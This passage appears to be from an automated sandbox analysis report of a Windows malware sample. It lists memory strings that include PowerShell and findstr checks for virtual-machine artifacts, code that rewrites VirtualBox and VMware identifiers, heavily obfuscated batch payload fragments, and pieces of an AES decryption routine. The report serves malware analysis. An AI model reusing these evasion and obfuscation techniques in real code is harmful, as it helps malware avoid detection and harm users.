Source: cmd.exe, 00000016.00000003.1463561088.000001B68B7BD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32\findstr.exefindstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK" findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK" Winsta0\Default=::=::\=C:=C:\Users\user\DesktopAbAjDNbOYADmRGoSEyiVfZzHvIi=*n*g($bRzqF[2]ABubtKOUqBymcTpKfurRYKXo=*r*e*a*m*;'.ReaCeGhaeuPDheJpZpncZt=Mp (vhVnA ([*CAdgrSkxLNEyqFBRLtxHUOMiPcJxyK=rMode]::CBC;$aEQGQUIMGKLPKgVPkQbyGadzOJu=QYfY=[System.SALLUSERSPROFILE=C:\ProgramDataAOHuWQKTZqYUwIWeVwGWOOt=owTitle = $SQOAPPDATA=C:\Users\user\AppData\RoamingapsXTkpYSCOIVnMoFYWGxHQmE= aTxBAfIsVGOdEHVTCWYkzzlF=bject *S*y*s*tatYOJpyUsiWZqDvoUlLGBPMPXXh=.Replace("@", avcbAURIXVqmBJwFdHeXcInFLpzUo=*r*t]::*F*r*o*ayZzBgvqIJBHyYScQRtw=TQYfY.Padding=aZwRjOwvieKYapjWmtLhrqF= $UpD (,[strinbAUZHZfrhpmIYgzEUBKQ=($zVdEq,$ulmvtbENpfb
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.36.dr | Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: svchost.exe, 00000024.00000000.1546628376.000002A76A49B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: vmcir:m
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.36.dr | Binary or memory string: nonicVMware Virtual disk 6000c298128b8c02a71a2474aeb5f3dc
Source: cmd.exe, 00000016.00000003.1527495754.000001B68B796000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: okhiguajDXsWTiFarGnbUapNVydqvHaeHHy%D%CGgPwHaNtiPKIfhxmiIhnUtmHqKOWXopmJculQRtTnVFfOvknkNWZzkImTifWmRwTAyYdNmwr%X%ooaYOhTUzBLksqMytirHLxHwzLEpwhzYrEKlkJxMplwLflBkLzJFUOGRGEydCDxsbMTNFBoKK%X%FszaVqnjuEWyUeCYTEGlujLNeJssOEklZUpwgQKnkTiZAUgIqOMWHzqvGLWmXVvPtLzZPfRcT%d%saBbMmkCKbZSoDAETQuUyqpxsFPuhTlWJcpyPtTyLJnTwXfhYvVoxhvcKdJhxPvQQcilobPzX%C%ViPcwbuzIwMXWzCHmOLKLbWnwdtPUSXFwrBYFZoboIOtJTTCGEbndPlUmBGsIFFPygBFYDbnz%B%JvdmDECkQjpQKBHfHMesVtIcYUDsnEcCONutiHJWdiRwpZNEUArRWUEqNaoIbkWlgNcXhnWZc%q%ipMBmNZhYxMnlFTjdGhtbVSmFqCWQxGDrOOFROBnoAdNjYUhiNdHPGbmwAWVldqARjWxQosof%T%TeARfcHwuNctYOKNBiqSFclkCVacwrTvPCVCAuryozQpnhSulKogbwzRTppjbEZdTHEwThmhR%L%RDglVXudGQMcNusceJkfhxKANwGDvBdyhpjStFXsUgvOmbgnluOybbJuTGyzrRHeMoUxkAIyL%T%SkabVnMpsrbMFwgFOYNhybdzrbYgIcKLqNjRJtYsLjYAFrhROSvCVrmQhBKToFHpGqwSnoWva%M%uwpdDTZUhsQHiPZAsKhIeefBITpVpDzVaBBVXNEIKZhnRIxAxrVEOMWqqNuJEeFDSUHGoeDEf%F%zYeWSKavOyXIVgnFkEjtUdGtEuWbQmsOqypORtxdtoPGHUXOtbdztllvrKsyNZEBfjrwRzORh%x%gZFnaLJwiHPiTufmTwgaZpuKnAyDBWUnmsnlFhrYJbFrOtlOljXcHQhQEVZznfVlNCWBhUHLf%B%hrXKdVUpKrrZRGvkwGKhSLDgtDmxKGrCmWzzkgBafkCNEmVWBqKnWDnvNQqzIxEdaOMVgVapf%u%JcIiPChIqVuVdFIJdLtQbrHFzNPzaPFqvhmBFnYoiRsBkhWiemcjHzesucJcMHHAqdAVshdQN%T%eIjZgurQHvONvJVdUgCDVCAjRlgHbPWilvCQUsoHrlfmTNUuESybBnRChZiVoKPRyFCagfiBS%=*%lKxopeqMcirVHYDaJUkstHwnNokUnzKWiGbheTKeFBIGACYEwgvnqzBEnkAbTvyCyuMbWwWPkgNRZ%.%PMlpGyhewGJexTUtIkjdfigQXHakFckLJFyxpMnXqybNdWzCbwCWEOTGFusYyXytvYvRvweWWmNHg%C%sNaixijAnhVMRSUtpysaIsfAHgFsGZsamAmHrPaPoThQAfDEkCHNuGyaHAArDRUoOUzrFmczyDLOk%*%oaCDbidrFGFbmZRoJmxYTcGFmYXAioRUJQtAYNBJQWjoTptmkkPqoPqmtWrckDjqOKrvGrqVKOiWS%o%sMWFLpXyAGTzhgcwzymNTzjYXGTUUGAHutbkuwzomRnexVykoykpVjYSCXHevdEUgmfNeSccZYAbm%m%fAchIGvvkLlvjHwPuSjmsXlQKgwwhpXIXGxxFWMxizVATsVkFnFfrOTholxCjZnVOCxCjZjxgLeTb%*%LWsklQUKSqiMpjuzknilaLrUsaGdhZFKZgCoesYitlWmpQTPPXWyVIbZFxRkkQCTLyMjGfuRoaRPP%p%fFCgQojdgPreCIHAOYDIdBRdKjKDekVQlkARpduCsPEIuedwNrAbohLEO
ywHDGZWTBSsiPlKDbpnW%r%iIFfnPMJTCeyWdQGMYMQHPTmLoXgQxnRyHFPRBqQmmaZOTlLudRdDwptPtuZSGTvpnapybPlHVEuP%*%UyRclMMGjobrmaygqYGtEJASWntoFvIRUDUVDXGUhOfZYXlarfrWYbkkXYfXsybOFkxIgDDtrMlPE%e%BUZcsXAdLTStJXESJBINqtOACUNBYFmPvGwegVZBBKUqEpwFZAIkDcohgyAyjYfgHcXdBAMOBhmFz%*%yVmxhCxWbmtroYHvBsCENJBrseyOUJvPIIICnbbwIjFQELnCesaPJaLOuUeddIcsRDJFqehAqgWEd%s%LMHQWJBIGgHXTisWXsZgnYbcHmalAyDegLJhxnhYBJkxcIxVPDsNXxPMLEiKIqihCDQhykyKlaFDN%s%EaZPfvWgQhIWWwTewqlBdUyRpwFfHCWSlYgEjVDUlbMwhkCNFGOKucKKBhzIQRynkQKYqoUBMqpci%"
Source: svchost.exe, 00000024.00000000.1562585901.000002A76C0B6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: dowvmci
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.36.dr | Binary or memory string: VMware
Source: svchost.exe, 00000024.00000002.3413741329.000002A76AF8C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: svchost.exe, 00000024.00000002.3413741329.000002A76AF8C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
Source: powershell.exe, 00000023.00000002.3376787099.000002131465E000.00000004.00000001.00020000.00000000.sdmp, product.bat, $rbx-CO2.bat.19.drBinary or memory string: !FSMEdrvzOwmtyaWzrcxQSpDVLdBMVmlazyTmwjFejByhXwmvrJMZpBbpoRTaQIDCllTahKdiwsGqRvXpQfvmzlLYxEYFqFoBXWWLCloHGECWUKySTEkKnrcZAVDDMxRR! "f%COAPlpSZrUfNOYjAKqVRRPHkbDHThLzDwkCXTUsIfdkGlfXUCfMlybXNgqNHIYSGuBrDvlGPY%M%nLNEaYWFMqcYofvnPQDhKahlElKNtzryXmkpkigrRbVHPIgvWqGudIonEBaOnilnYDbbUfdGK%t%lpIezvVfoRdSXvoYXKIireJQIJmHeBQnZJRtFjegeJYriuaiMdXuuyshGSvQjobNaQToDVsOF%K%CdIfrHoIdUaEwSArJNNNoWQHkrrAMEQKiOSvJcokhiguajDXsWTiFarGnbUapNVydqvHaeHHy%D%CGgPwHaNtiPKIfhxmiIhnUtmHqKOWXopmJculQRtTnVFfOvknkNWZzkImTifWmRwTAyYdNmwr%X%ooaYOhTUzBLksqMytirHLxHwzLEpwhzYrEKlkJxMplwLflBkLzJFUOGRGEydCDxsbMTNFBoKK%X%FszaVqnjuEWyUeCYTEGlujLNeJssOEklZUpwgQKnkTiZAUgIqOMWHzqvGLWmXVvPtLzZPfRcT%d%saBbMmkCKbZSoDAETQuUyqpxsFPuhTlWJcpyPtTyLJnTwXfhYvVoxhvcKdJhxPvQQcilobPzX%C%ViPcwbuzIwMXWzCHmOLKLbWnwdtPUSXFwrBYFZoboIOtJTTCGEbndPlUmBGsIFFPygBFYDbnz%B%JvdmDECkQjpQKBHfHMesVtIcYUDsnEcCONutiHJWdiRwpZNEUArRWUEqNaoIbkWlgNcXhnWZc%q%ipMBmNZhYxMnlFTjdGhtbVSmFqCWQxGDrOOFROBnoAdNjYUhiNdHPGbmwAWVldqARjWxQosof%T%TeARfcHwuNctYOKNBiqSFclkCVacwrTvPCVCAuryozQpnhSulKogbwzRTppjbEZdTHEwThmhR%L%RDglVXudGQMcNusceJkfhxKANwGDvBdyhpjStFXsUgvOmbgnluOybbJuTGyzrRHeMoUxkAIyL%T%SkabVnMpsrbMFwgFOYNhybdzrbYgIcKLqNjRJtYsLjYAFrhROSvCVrmQhBKToFHpGqwSnoWva%M%uwpdDTZUhsQHiPZAsKhIeefBITpVpDzVaBBVXNEIKZhnRIxAxrVEOMWqqNuJEeFDSUHGoeDEf%F%zYeWSKavOyXIVgnFkEjtUdGtEuWbQmsOqypORtxdtoPGHUXOtbdztllvrKsyNZEBfjrwRzORh%x%gZFnaLJwiHPiTufmTwgaZpuKnAyDBWUnmsnlFhrYJbFrOtlOljXcHQhQEVZznfVlNCWBhUHLf%B%hrXKdVUpKrrZRGvkwGKhSLDgtDmxKGrCmWzzkgBafkCNEmVWBqKnWDnvNQqzIxEdaOMVgVapf%u%JcIiPChIqVuVdFIJdLtQbrHFzNPzaPFqvhmBFnYoiRsBkhWiemcjHzesucJcMHHAqdAVshdQN%T%eIjZgurQHvONvJVdUgCDVCAjRlgHbPWilvCQUsoHrlfmTNUuESybBnRChZiVoKPRyFCagfiBS%=*%lKxopeqMcirVHYDaJUkstHwnNokUnzKWiGbheTKeFBIGACYEwgvnqzBEnkAbTvyCyuMbWwWPkgNRZ%.%PMlpGyhewGJexTUtIkjdfigQXHakFckLJFyxpMnXqybNdWzCbwCWEOTGFusYyXytvYvRvweWWmNHg%C%sNaixijAnhVMRSUtp
ysaIsfAHgFsGZsamAmHrPaPoThQAfDEkCHNuGyaHAArDRUoOUzrFmczyDLOk%*%oaCDbidrFGFbmZRoJmxYTcGFmYXAioRUJQtAYNBJQWjoTptmkkPqoPqmtWrckDjqOKrvGrqVKOiWS%o%sMWFLpXyAGTzhgcwzymNTzjYXGTUUGAHutbkuwzomRnexVykoykpVjYSCXHevdEUgmfNeSccZYAbm%m%fAchIGvvkLlvjHwPuSjmsXlQKgwwhpXIXGxxFWMxizVATsVkFnFfrOTholxCjZnVOCxCjZjxgLeTb%*%LWsklQUKSqiMpjuzknilaLrUsaGdhZFKZgCoesYitlWmpQTPPXWyVIbZFxRkkQCTLyMjGfuRoaRPP%p%fFCgQojdgPreCIHAOYDIdBRdKjKDekVQlkARpduCsPEIuedwNrAbohLEOywHDGZWTBSsiPlKDbpnW%r%iIFfnPMJTCeyWdQGMYMQHPTmLoXgQxnRyHFPRBqQmmaZOTlLudRdDwptPtuZSGTvpnapybPlHVEuP%*%UyRclMMGjobrmaygqYGtEJASWntoFvIRUDUVDXGUhOfZYXlarfrWYbkkXYfXsybOFkxIgDDtrMlPE%e%BUZcsXAdLTStJXESJBINqtOACUNBYFmPvGwegVZBBKUqEpwFZAIkDcohgyAyjYfgHcXdBAMOBhmFz%*%yVmxhCxWbmtroYHvBsCENJBrseyOUJvPIIICnbbwIjFQELnCesaPJaLOuUeddIcsRDJFqehAqgWEd%s%LMHQWJBIGgHXTisWXsZgnYbcHmalAyDegLJhxnhYBJkxcIxVPDsNXxPMLEiKIqihCDQhykyKlaFDN%s%EaZPfvWgQhIWWwTewqlBdUyRpwFfHCWSlYgEjVDUlbMwhkCNFGOKucKKBhzIQRynkQKYqoUBMqpci%"
Source: lsass.exe, 00000010.00000000.1416813718.0000017D2CE91000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.36.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: Microsoft-Windows-Partition%4Diagnostic.evtx.36.drBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: cmd.exe, 00000016.00000003.1484014593.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1484369314.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1482211032.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1487300764.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1486881918.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1484505880.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1483753694.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1485499049.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1462971364.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1483317075.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1482696640.000001B68B78C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK"
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.36.drBinary or memory string: storahciNECVMWarVMware SATA CD00
Source: dwm.exe, 00000012.00000002.3415712940.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Bus\0000SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000PCI\VEN_8
Source: lsass.exe, 00000010.00000002.3348263059.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416730879.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1419270994.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3333488909.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000000.1506765871.000001EF0502F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.3339558225.000001EF0502B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.1513638479.000002287A040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.3348737864.000002287A040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3339816682.000001B94D436000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001E.00000000.1520537730.000001B94D436000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.3343779127.000002A769A2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: lsass.exe, 00000010.00000000.1416813718.0000017D2CE91000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.36.drBinary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc@
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.36.drBinary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc8
Source: powershell.exe, 00000023.00000002.3376787099.000002131465E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: !fsVzlMERNFVIOdMffLMuDnFTWkHILViMKSPrCtIRFTzMgrMSQxGMewASN! "N%fRgNnfhhsCkdxTDuXhKOLLUpnBHbIUjwQkGknBUEJgFaDqGMKRIwIx%P%wuWQzMygyytOmnmshwnfeEfUMXUUqRmMNtOmnwbhgDIhGPdtArKljC%c%tRoceCRDPGlGaTyafKvfZBWYnWTBuZhaCkZWYlsyqDNbVaPkUzlZQe%s%DSUpOiIqjQzldQTBcTsWOvNVdnhJGUNhjxGhcIwkPatXBJWYqtxrHU%M%qheYlAaZJocrbFjMztxhgOcQttrisnxvAphyddwVjQqfUkIqPETeUz%b%NCfnESjSHwRGRLyKJvWBYqxXVjLatNttBaBFtPyEMriUnotWSeVyht%t%BxeirvhizTcyfRjSrTWsOGhCJHQOioSVlhyeAkxdxDSpSPiBMZNbBP%o%EUpCzKFsZkbhmYsfrgwTUlOSKTyocjBQtwCDPYLMyeDHnKCkiHHGFI%h%UtgwRFmqqQJkOPvPptuJvQHgEarnfuCUkKCjwshgAhONYdVNPtrolW%K%ndMZRRoYkVoOadmmsXloinbTiBeDyMdnIoxyxxBqSCXTzkcSACaucX%R%OacSRqNKAySafMGOPVwVwFpiuXyldVLJkLzxwEFlDhcybzeqmMNfYh%n%AiKUyTRBGFNiPumirkplsoDRgVTiZrhFKdkrMBgMtbBxLSJJeduDQN%Y%OlFSNCaIBoxhyLjVwPdDRqNggoljeWXEPXpZLTODLKAmZDuXAiHEzn%D%WyyyMyrQEFqSsAwkjCbzRgQAhCUoJVotfCbRAnhpmUgUWgkTAqYeCZ%O%vQHYrjEchJqXNQzFJWvLnWZVEasaNsWjQggljCVXLkMxDYsuuVGcJQ%t%MyQLtqRDpOMggHKnwhayacjCsFHXFSMTAauHvxiFfhVYKwRLKhyzcl%e%PJontOJTXwcSGgncSYYvtThlSVOVnytnRpkLsheuVljyVRQLyHoAAH%G%SWBdvxZNFzcPbrWBJKUDzhJJqafdxGjTMjwnkpMGuiFKvgQyOWYEGW%n%iKmRNusWpZpjcSUIrtXnjrCZnjkGoAHFnPbMbsCsnxSFumdXDfEEHs%l%NQhmEDkMIPrKWnRiHZRFaLzXFbgmciWdYUbkEOOYiBPdnKqPgvyFMb%F%scrkHCwXJzSoMblGDTlSxyVwJUKqgGKqqWCZTuglBkRpkZYpEASEuU%E%ETgVAMSgQcPBXPzlNjNZqmGGlKWvLGOfWwrITXTttvtOzIbiPsMIRu%t%DsnzJPQwuknKFByQsPptGVSRgDJOFsTgnCSYvtodDWajAPdzKZaWty%l%NIAvtfgcQbrhwcIzvYBmQJUIqqAjeGsWMPPkyZaiXAgZRttbRkDcvh%=o%dNRecFWYkJuuGmxbvXtopDVRXXzsTdpBFhLwGVYCaCWpxYNOtjhebSrzSagfgEehuTPyB%+%buAZRoNHGtZjLYJVkzNPlEGOTvvxOVDjonsPGfkDESmGhVvGvljubIpwOMgvSpSKQQVxF%4%UofojltsZHXaPcDLjhFXWaUZPLpZBQqZXaAWefRxVeOeiudnpYGIpAJUugyyVuRjqXcOB%Q%GHdqicRlPQuHbJCjHKxqGCYHsBAnFNksoLIrDsgxRIEpeRTKoZJnFxVeJwXGCEFbFcsqb%=%lGpDazYYIDBHPYGeXNRQEHgvzUmcCJbzDJdtuJEYXfbTvZMGZXIpBAwDzTdfmVvYBcefU%=%nKoiTTyGnZAhGcFbMXdnATAFzLbJcstVHMMmugHGXXmUDXGSQXPeaRuukIJhRPDVGFATq%'%s
HFqwqCGGcBeiTfCoUPrscLxAPitrnYwMCypjOEBRNDGhcJVysrKLCYpViPHhjoseesGu%)%PtAqnAEyfpxgmUZWnLkEitaYXtIzlCcKcBJYQuxbtQQTrAVoovQthclvtBtUSfnDmNdLl%;%bgToikrDhGwytkQLJCapnFoaDjoDnGExkdnpWeZRTSlUXvzVxRCldvYwRTKYWOqAcYnpX%%APEDivvttdhKtgvdtuPfRydtaVfBLSYijYWcXHUZCcxPDoDHUwJEykfcLkDnqTIBeYBvk%$%tgLzPCObnQLryHoiuJYSUqMeHJJuVLEMixAqXeJIrbyuRVRlutKpDCpdtHSfStfClZjbg%b%XkpapATSsmLRxaCbpjFhxXqmDQXVWiSMQfwivoocwlavhnutDAWPETJZUcwzCYWjtZbsE%q%tFaVCLmWUfpvErvmciXvwnsROAypRchmbPjUVUbixcZXhdXGAWqReXhgnjgcnWfSXduPi%y%ArigPYtouKLCSOULqieHdHMOYVAXgZdJixaFiKoZNRSyuAvilhHVphfSEthUxwhvHbuuN%"
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.36.drBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000024.00000002.3413741329.000002A76AF8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: svchost.exe, 0000002A.00000002.3341685727.000002517802B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
Source: svchost.exe, 0000002E.00000000.1607134927.00000297A5600000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 00000010.00000000.1416813718.0000017D2CE91000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
Source: $rbx-CO2.bat.19.drBinary or memory string: !fsVzlMERNFVIOdMffLMuDnFTWkHILViMKSPrCtIRFTzMgrMSQxGMewASN! "N%fRgNnfhhsCkdxTDuXhKOLLUpnBHbIUjwQkGknBUEJgFaDqGMKRIwIx%P%wuWQzMygyytOmnmshwnfeEfUMXUUqRmMNtOmnwbhgDIhGPdtArKljC%c%tRoceCRDPGlGaTyafKvfZBWYnWTBuZhaCkZWYlsyqDNbVaPkUzlZQe%s%DSUpOiIqjQzldQTBcTsWOvNVdnhJGUNhjxGhcIwkPatXBJWYqtxrHU%M%qheYlAaZJocrbFjMztxhgOcQttrisnxvAphyddwVjQqfUkIqPETeUz%b%NCfnESjSHwRGRLyKJvWBYqxXVjLatNttBaBFtPyEMriUnotWSeVyht%t%BxeirvhizTcyfRjSrTWsOGhCJHQOioSVlhyeAkxdxDSpSPiBMZNbBP%o%EUpCzKFsZkbhmYsfrgwTUlOSKTyocjBQtwCDPYLMyeDHnKCkiHHGFI%h%UtgwRFmqqQJkOPvPptuJvQHgEarnfuCUkKCjwshgAhONYdVNPtrolW%K%ndMZRRoYkVoOadmmsXloinbTiBeDyMdnIoxyxxBqSCXTzkcSACaucX%R%OacSRqNKAySafMGOPVwVwFpiuXyldVLJkLzxwEFlDhcybzeqmMNfYh%n%AiKUyTRBGFNiPumirkplsoDRgVTiZrhFKdkrMBgMtbBxLSJJeduDQN%Y%OlFSNCaIBoxhyLjVwPdDRqNggoljeWXEPXpZLTODLKAmZDuXAiHEzn%D%WyyyMyrQEFqSsAwkjCbzRgQAhCUoJVotfCbRAnhpmUgUWgkTAqYeCZ%O%vQHYrjEchJqXNQzFJWvLnWZVEasaNsWjQggljCVXLkMxDYsuuVGcJQ%t%MyQLtqRDpOMggHKnwhayacjCsFHXFSMTAauHvxiFfhVYKwRLKhyzcl%e%PJontOJTXwcSGgncSYYvtThlSVOVnytnRpkLsheuVljyVRQLyHoAAH%G%SWBdvxZNFzcPbrWBJKUDzhJJqafdxGjTMjwnkpMGuiFKvgQyOWYEGW%n%iKmRNusWpZpjcSUIrtXnjrCZnjkGoAHFnPbMbsCsnxSFumdXDfEEHs%l%NQhmEDkMIPrKWnRiHZRFaLzXFbgmciWdYUbkEOOYiBPdnKqPgvyFMb%F%scrkHCwXJzSoMblGDTlSxyVwJUKqgGKqqWCZTuglBkRpkZYpEASEuU%E%ETgVAMSgQcPBXPzlNjNZqmGGlKWvLGOfWwrITXTttvtOzIbiPsMIRu%t%DsnzJPQwuknKFByQsPptGVSRgDJOFsTgnCSYvtodDWajAPdzKZaWty%l%NIAvtfgcQbrhwcIzvYBmQJUIqqAjeGsWMPPkyZaiXAgZRttbRkDcvh%=o%dNRecFWYkJuuGmxbvXtopDVRXXzsTdpBFhLwGVYCaCWpxYNOtjhebSrzSagfgEehuTPyB%+%buAZRoNHGtZjLYJVkzNPlEGOTvvxOVDjonsPGfkDESmGhVvGvljubIpwOMgvSpSKQQVxF%4%UofojltsZHXaPcDLjhFXWaUZPLpZBQqZXaAWefRxVeOeiudnpYGIpAJUugyyVuRjqXcOB%Q%GHdqicRlPQuHbJCjHKxqGCYHsBAnFNksoLIrDsgxRIEpeRTKoZJnFxVeJwXGCEFbFcsqb%=%lGpDazYYIDBHPYGeXNRQEHgvzUmcCJbzDJdtuJEYXfbTvZMGZXIpBAwDzTdfmVvYBcefU%=%nKoiTTyGnZAhGcFbMXdnATAFzLbJcstVHMMmugHGXXmUDXGSQXPeaRuukIJhRPDVGFATq%'%sHFqwqCGGcBeiTfCoUPrscLxAPitrnYwMCypjOEBRNDGhcJVysrKLCYpViPHhjoseesGu%)%PtAqnAEyfpxgm
UZWnLkEitaYXtIzlCcKcBJYQuxbtQQTrAVoovQthclvtBtUSfnDmNdLl%;%bgToikrDhGwytkQLJCapnFoaDjoDnGExkdnpWeZRTSlUXvzVxRCldvYwRTKYWOqAcYnpX%%APEDivvttdhKtgvdtuPfRydtaVfBLSYijYWcXHUZCcxPDoDHUwJEykfcLkDnqTIBeYBvk%$%tgLzPCObnQLryHoiuJYSUqMeHJJuVLEMixAqXeJIrbyuRVRlutKpDCpdtHSfStfClZjbg%b%XkpapATSsmLRxaCbpjFhxXqmDQXVWiSMQfwivoocwlavhnutDAWPETJZUcwzCYWjtZbsE%q%tFaVCLmWUfpvErvmciXvwnsROAypRchmbPjUVUbixcZXhdXGAWqReXhgnjgcnWfSXduPi%y%ArigPYtouKLCSOULqieHdHMOYVAXgZdJixaFiKoZNRSyuAvilhHVphfSEthUxwhvHbuuN%"
Source: svchost.exe, 00000011.00000002.3333488909.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000@3
Source: svchost.exe, 0000001A.00000000.1476993256.000002234AE79000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltion1301
Source: svchost.exe, 00000024.00000002.3413741329.000002A76AF8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 00000012.00000002.3415712940.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node (graph_14-616)
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node (graph_14-702)
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D1E84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001CA7D1E84B0
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D1E1E3C LoadLibraryA,GetProcAddress,SleepEx,15_2_000001CA7D1E1E3C
Source: C:\Windows\System32\dllhost.exeCode function: 14_2_0000000140001CF0 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,K32EnumProcesses,OpenProcess,K32EnumProcessModulesEx,ReadProcessMemory,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,RtlFreeHeap,14_2_0000000140001CF0
